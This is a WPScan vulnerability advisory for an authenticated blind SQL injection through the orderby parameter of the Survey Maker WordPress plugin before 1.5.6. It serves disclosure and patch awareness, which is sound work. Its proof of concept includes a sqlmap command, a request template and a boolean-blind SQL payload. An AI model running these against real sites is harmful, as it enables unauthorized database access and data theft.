WordPress Plugin Vulnerabilities
Survey Maker < 1.5.6 - Authenticated Blind SQL Injections
Description
The get_results() and get_items() functions in the plugin did not use whitelist or validate the orderby parameter before using it in SQL statements passed to the get_results() DB calls, leading to SQL injection issues in the admin dashboard
Note (WPScanTeam): Other SQLi were identified when confirming the report, and fixed by the vendor as well but have not been detailed here
Proof of Concept
Exploit All of them with same technique.
SQLMAP: python sqlmap.py -r r.txt -p orderby --level 5 --risk 3 --dbms MySQL --technique B --dbs
With r.txt is GET OR POST requests to sort item in plugin Menu.
GET /wp-admin/admin.php?page=.........&orderby=id--&order=desc HTTP/1.1
Host: ...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ...
Upgrade-Insecure-Requests: 1
SQLMAP OUTPUT:
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=............&orderby=(SELECT (CASE WHEN (5750=5750) THEN 0x7469746c65 ELSE (SELECT 1570 UNION SELECT 3396) END))&order=asc
---
[22:38:25] [INFO] testing MySQL
[22:38:25] [INFO] confirming MySQL
[22:38:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0
Affects Plugins
Fixed in 1.5.6 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
To Quang Duong
Submitter
duongtq
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-29 (about 2 years ago)
Added
2021-06-29 (about 2 years ago)
Last Updated
2021-08-10 (about 2 years ago)
WPScan 